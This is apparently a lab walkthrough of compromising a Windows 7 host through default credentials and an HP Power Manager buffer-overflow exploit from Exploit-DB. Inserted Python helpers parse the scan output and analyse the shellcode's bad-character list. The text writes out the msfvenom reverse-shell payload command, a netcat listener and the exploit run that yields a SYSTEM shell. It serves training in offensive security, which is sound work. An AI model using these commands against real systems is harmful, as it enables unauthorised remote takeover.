Enumeration

rustscan -a 192.168.152.45 --ulimit 5000

Open 192.168.152.45:80
Open 192.168.152.45:135
Open 192.168.152.45:139
Open 192.168.152.45:445
Open 192.168.152.45:3389
Open 192.168.152.45:3573
Open 192.168.152.45:49153
Open 192.168.152.45:49155
Open 192.168.152.45:49154
Open 192.168.152.45:49152
Open 192.168.152.45:49159
Open 192.168.152.45:49158

From the open ports (135, 139, 445, 3389) we can tell that we will be attacking a target running Windows.
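The same inference, made programmatically, as an added example that is not part of the original write-up: a small Python triage helper parses the rustscan output above, picks out the Windows-typical ports and the high ports in the default Windows dynamic RPC range, and returns a per-host verdict. Run over a defender's own internal scan results it produces the same list of hosts exposing SMB and RDP. The port-to-service names and the 49152-65535 dynamic RPC range are standard Windows facts, not taken from this page; the scan text is a constructed copy of the output shown above.

```python
import re
from collections import defaultdict

# Constructed copy of the rustscan output from this write-up (same host, same ports).
SCAN_OUTPUT = """\
Open 192.168.152.45:80
Open 192.168.152.45:135
Open 192.168.152.45:139
Open 192.168.152.45:445
Open 192.168.152.45:3389
Open 192.168.152.45:3573
Open 192.168.152.45:49153
Open 192.168.152.45:49155
Open 192.168.152.45:49154
Open 192.168.152.45:49152
Open 192.168.152.45:49159
Open 192.168.152.45:49158
"""

# Well-known ports that together are a strong Windows fingerprint.
WINDOWS_PORTS = {
    135: "MSRPC endpoint mapper",
    139: "NetBIOS session service",
    445: "SMB",
    3389: "RDP",
}

# Default dynamic RPC port range on Windows Vista and later.
DYNAMIC_RPC_RANGE = range(49152, 65536)

OPEN_LINE = re.compile(r"^Open\s+(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})\s*$")


def parse_rustscan(text: str) -> dict:
    """Collect the open ports rustscan reported, grouped by host and sorted ascending."""
    hosts = defaultdict(set)
    for line in text.splitlines():
        m = OPEN_LINE.match(line.strip())
        if m:
            hosts[m.group(1)].add(int(m.group(2)))
    return {host: sorted(ports) for host, ports in hosts.items()}


def windows_indicators(ports) -> list:
    """(port, service) for every Windows-typical port that is open."""
    return [(p, WINDOWS_PORTS[p]) for p in ports if p in WINDOWS_PORTS]


def dynamic_rpc_ports(ports) -> list:
    """Open ports inside the Windows dynamic RPC range (usually RPC endpoints)."""
    return [p for p in ports if p in DYNAMIC_RPC_RANGE]


def triage(text: str) -> dict:
    """Per-host summary: indicators found, dynamic RPC ports, and an OS guess."""
    result = {}
    for host, ports in parse_rustscan(text).items():
        ind = windows_indicators(ports)
        dyn = dynamic_rpc_ports(ports)
        # Two well-known Windows ports, or SMB plus dynamic RPC endpoints, is enough to call it.
        likely = len(ind) >= 2 or (445 in ports and len(dyn) >= 1)
        result[host] = {
            "open": ports,
            "windows_indicators": ind,
            "dynamic_rpc": dyn,
            "verdict": "likely Windows" if likely else "unknown",
        }
    return result


if __name__ == "__main__":
    for host, info in triage(SCAN_OUTPUT).items():
        print(host, info["verdict"])
        for port, svc in info["windows_indicators"]:
            print(f"  {port}/tcp  {svc}")
        print(f"  dynamic RPC endpoints: {info['dynamic_rpc']}")
```

The verdict rule is deliberately conservative: a single open 3389 on its own says nothing, but 135 plus 445, or 445 plus a handful of 4915x ports, is the pattern nmap's OS detection later confirms as Windows 7.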

Let's also run an nmap scan with default scripts and version detection to see what we can gather about these open ports:

nmap -sCVS 192.168.152.45

Our target is running Windows 7 lol


Let's check the SMB shares and see whether guest login is allowed, using crackmapexec.


Good thing they disabled the guest account.

Let's check the service running on port 80.

I have never seen this before, but hey, there is no way the login credentials are admin:admin, right?


Well...

We are in, and a quick search on the software version shown on the site reveals that it can be exploited.


This is an older lab, but it's cool to see these attacks in action.

A Google search for "HP Power Manager 4.2 (Build 7) exploit" leads to an Exploit-DB page with a juicy exploit we can use on this target: https://www.exploit-db.com/exploits/10099

It looks like we will need to modify this script so that the reverse shell connects back to us.


The author of the script uses alphanumeric shellcode.

This is likely because of the character filtering in the HP Power Manager tool.

We can easily replace this shellcode with our own using msfvenom:

msfvenom -p windows/shell_reverse_tcp -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" LHOST=$IP LPORT=4444 -e x86/alpha_mixed -f c

Note that the bad characters we pass to msfvenom for this shellcode come from the documentation the script author left in the exploit.

We replace the alphanumeric shellcode in the script with our own, taken from the output of the msfvenom command.
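Why a byte blocklist like the one above is not a real mitigation, as an added Python example that is neither from this write-up nor from the exploit script: it parses the exact -b list given to msfvenom, shows that every alphanumeric byte survives the filter (which is all an encoder such as x86/alpha_mixed needs), groups the blocked bytes to show that the filter is really a list of URL/form delimiters (space, %, &, =, +, /, ?, #, CR, LF) rather than a security control, and provides the check a reviewer would run to see whether a buffer gets through a filter at all. The two sample buffers are constructed strings, not shellcode.

```python
import string

# The "-b" argument exactly as given to msfvenom in this write-up.
BADCHARS = r"\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a"

# The only bytes an alphanumeric encoder (msfvenom's x86/alpha_mixed, for example) emits.
ALNUM = frozenset(string.ascii_letters.encode() + string.digits.encode())


def parse_badchars(spec: str) -> frozenset:
    """Turn a "\\x00\\x3a..." list into a set of byte values (duplicates collapse)."""
    values = set()
    for part in spec.split(r"\x"):
        if not part:
            continue
        if len(part) != 2:
            raise ValueError(f"malformed escape in bad-char list: {part!r}")
        values.add(int(part, 16))
    return frozenset(values)


def allowed_bytes(bad: frozenset) -> frozenset:
    """Everything the filter lets through."""
    return frozenset(range(256)) - bad


def alnum_survives(bad: frozenset) -> bool:
    """True when the filter blocks none of [0-9A-Za-z]; an alphanumeric encoder then defeats it."""
    return ALNUM.isdisjoint(bad)


def categorize(bad: frozenset) -> dict:
    """Group the blocked bytes to see what the filter was actually written for."""
    groups = {"control": [], "whitespace": [], "punctuation": [], "other": []}
    for b in sorted(bad):
        if b in (0x09, 0x0A, 0x0B, 0x0D, 0x20):
            groups["whitespace"].append(b)
        elif b < 0x20:
            groups["control"].append(b)
        elif chr(b) in string.punctuation:
            groups["punctuation"].append(b)
        else:
            groups["other"].append(b)
    return groups


def find_bad_bytes(buf: bytes, bad: frozenset) -> list:
    """(offset, value) for every byte of buf the filter would mangle; empty means it passes."""
    return [(i, b) for i, b in enumerate(buf) if b in bad]


if __name__ == "__main__":
    bad = parse_badchars(BADCHARS)
    print(f"{len(bad)} distinct blocked bytes, {len(allowed_bytes(bad))} allowed")
    print("all alphanumeric bytes allowed:", alnum_survives(bad))
    for name, members in categorize(bad).items():
        print(f"  {name:11s} {' '.join(f'{b:02x}' for b in members)}")
    # Constructed sample buffers, not real shellcode.
    print(find_bad_bytes(b"Qk3zPwAAbb", bad))  # []
    print(find_bad_bytes(b"ab c=d", bad))      # [(2, 32), (4, 61)]
```

The takeaway for anyone maintaining a service like this: the list blocks 20 of 256 byte values and leaves all 62 alphanumeric ones, so it only ever protected the request parser from malformed form data. The fix for the underlying bug is bounds checking on the login field, not a longer blocklist.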

Now let's start a listener and run the script:

nc -lvnp 4444

python2 10099.py 192.168.152.45


And it looks like we already have root access, no privilege escalation required... sick!
